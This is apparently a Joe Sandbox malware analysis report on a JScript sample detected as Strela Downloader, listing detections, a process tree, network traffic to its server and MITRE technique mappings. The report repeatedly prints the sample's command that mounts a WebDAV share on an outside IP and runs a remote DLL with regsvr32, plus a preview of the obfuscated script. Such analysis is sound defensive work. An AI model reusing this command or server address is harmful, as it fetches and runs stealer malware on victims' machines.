Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
177183177683425839.js

Overview

General Information

Sample name:177183177683425839.js
Analysis ID:1583340
MD5:1c1670aac02c2a2779e5997a70a15d7f
SHA1:499cf54d702b73b05479b8dd857fac02260edee2
SHA256:d52046cfadfcbe7dac26f62b5f0ce6479f8d87915a242fe5e8feea41b6c98dd1
Tags:jsStrelaStealeruser-cocaman
Infos:

Detection

Strela Downloader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6412 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6104 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3180 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 6436 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 6412JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_6412.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", ProcessId: 6412, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 6436, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6412, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll, ProcessId: 6104, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js", ProcessId: 6412, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 6436, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 6436, ProcessName: net.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-02T14:04:48.513626+010018100051Potentially Bad Traffic192.168.2.549704193.143.1.2318888TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 177183177683425839.jsReversingLabs: Detection: 26%
      Source: 177183177683425839.jsVirustotal: Detection: 34%Perma Link

      Networking

      barindex
      Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49704 -> 193.143.1.231:8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
      Source: global trafficTCP traffic: 192.168.2.5:53738 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 193.143.1.231 193.143.1.231
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2253657642.00000216C155D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2253657642.00000216C1581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/0
      Source: net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/paces

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_6412.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6412, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 177183177683425839.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal88.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 177183177683425839.jsReversingLabs: Detection: 26%
      Source: 177183177683425839.jsVirustotal: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 1988Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@+Y
      Source: net.exe, 00000005.00000002.2253657642.00000216C158D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583340 Sample: 177183177683425839.js Startdate: 02/01/2025 Architecture: WINDOWS Score: 88 24 Suricata IDS alerts for network traffic 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 Yara detected Strela Downloader 2->28 30 2 other signatures 2->30 8 wscript.exe 1 1 2->8         started        process3 signatures4 32 JScript performs obfuscated calls to suspicious functions 8->32 34 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->34 36 Gathers information about network shares 8->36 11 cmd.exe 1 8->11         started        process5 signatures6 38 Gathers information about network shares 11->38 14 cmd.exe 1 11->14         started        17 conhost.exe 11->17         started        process7 signatures8 40 Gathers information about network shares 14->40 19 net.exe 1 14->19         started        process9 dnsIp10 22 193.143.1.231, 49704, 8888 BITWEB-ASRU unknown 19->22

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      177183177683425839.js26%ReversingLabsScript-JS.Trojan.StrelaStealer
      177183177683425839.js34%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://193.143.1.231:8888/00%Avira URL Cloudsafe
      http://193.143.1.231:8888/paces0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2253657642.00000216C155D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2253657642.00000216C1581000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://193.143.1.231:8888/0net.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://193.143.1.231:8888/pacesnet.exe, 00000005.00000002.2253657642.00000216C1530000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        193.143.1.231
        unknownunknown
        57271BITWEB-ASRUtrue
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1583340
        Start date and time:2025-01-02 14:03:35 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 3s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Without Instrumentation
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:177183177683425839.js
        Detection:MAL
        Classification:mal88.rans.troj.spyw.evad.winJS@8/0@0/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .js
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        08:04:48API Interceptor1x Sleep call for process: net.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        193.143.1.231264531187863018088.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        264531187863018088.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        2439793531535825300.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        2439793531535825300.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231:8888/
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        BITWEB-ASRU264531187863018088.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231
        264531187863018088.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231
        2439793531535825300.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231
        2439793531535825300.jsGet hashmaliciousStrela DownloaderBrowse
        • 193.143.1.231
        dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.66
        dlr.x86.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.66
        Launcher_x64.exeGet hashmaliciousLummaCBrowse
        • 193.143.1.9
        WonderHack.exeGet hashmaliciousLummaCBrowse
        • 193.143.1.9
        Wave-Executor.exeGet hashmaliciousLummaCBrowse
        • 193.143.1.9
        No context
        No context
        No created / dropped files found
        File type:ASCII text, with very long lines (65536), with no line terminators
        Entropy (8bit):4.932441473336778
        TrID:
          File name:177183177683425839.js
          File size:142'105 bytes
          MD5:1c1670aac02c2a2779e5997a70a15d7f
          SHA1:499cf54d702b73b05479b8dd857fac02260edee2
          SHA256:d52046cfadfcbe7dac26f62b5f0ce6479f8d87915a242fe5e8feea41b6c98dd1
          SHA512:2cf590f7f4fdd66c79ccbac9959fb81628962d3c1d9335c6d9178a6588d60f7bf6e20360047775b482327a921abefcbc5a406e5042484474b8ad805ccd947147
          SSDEEP:3072:3Akt+EMSkmd1IWBqhNkD2wtnQMWp7QIVcttT3e:3Akt+EMSkmd1IWBqhNkD2wtnQMWp7QIz
          TLSH:72D3F08A91634323FEFDD97D42E486824D58AC6DBA4F4782303C6DB242D19DCA5D873B
          File Content Preview:function yaplens(){this[gyytpqsop+ailyaw+yuyzsld+jqudqndan](ieiejpvt+tewblpsyn+xtfywe+ivxokwcp+mpluzr+jqudqndan+pmeblih+xtfywe+pmeblih+yuyzsld+pmeblih+omuxpnywu+etoqtycu+kshizs+pmeblih+bhewzpu+yowpvak+uzcwlox+etoqtycu+ailyaw+uwjrlzjpn+xtfywe+rpqqrqgzi+ksh
          Icon Hash:68d69b8bb6aa9a86
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2025-01-02T14:04:48.513626+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.549704193.143.1.2318888TCP
          TimestampSource PortDest PortSource IPDest IP
          Jan 2, 2025 14:04:27.124784946 CET497048888192.168.2.5193.143.1.231
          Jan 2, 2025 14:04:27.129692078 CET888849704193.143.1.231192.168.2.5
          Jan 2, 2025 14:04:27.129853010 CET497048888192.168.2.5193.143.1.231
          Jan 2, 2025 14:04:27.129992008 CET497048888192.168.2.5193.143.1.231
          Jan 2, 2025 14:04:27.134790897 CET888849704193.143.1.231192.168.2.5
          Jan 2, 2025 14:04:46.132932901 CET5373853192.168.2.51.1.1.1
          Jan 2, 2025 14:04:46.137790918 CET53537381.1.1.1192.168.2.5
          Jan 2, 2025 14:04:46.137872934 CET5373853192.168.2.51.1.1.1
          Jan 2, 2025 14:04:46.142682076 CET53537381.1.1.1192.168.2.5
          Jan 2, 2025 14:04:46.589165926 CET5373853192.168.2.51.1.1.1
          Jan 2, 2025 14:04:46.594449997 CET53537381.1.1.1192.168.2.5
          Jan 2, 2025 14:04:46.594548941 CET5373853192.168.2.51.1.1.1
          Jan 2, 2025 14:04:48.513463974 CET888849704193.143.1.231192.168.2.5
          Jan 2, 2025 14:04:48.513626099 CET497048888192.168.2.5193.143.1.231
          Jan 2, 2025 14:04:48.513906002 CET497048888192.168.2.5193.143.1.231
          Jan 2, 2025 14:04:48.520890951 CET888849704193.143.1.231192.168.2.5
          TimestampSource PortDest PortSource IPDest IP
          Jan 2, 2025 14:04:46.132473946 CET53582191.1.1.1192.168.2.5
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549704193.143.1.23188886436C:\Windows\System32\net.exe
          TimestampBytes transferredDirectionData
          Jan 2, 2025 14:04:27.129992008 CET107OUTOPTIONS / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: DavClnt
          translate: f
          Host: 193.143.1.231:8888


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:08:04:25
          Start date:02/01/2025
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\177183177683425839.js"
          Imagebase:0x7ff6a9280000
          File size:170'496 bytes
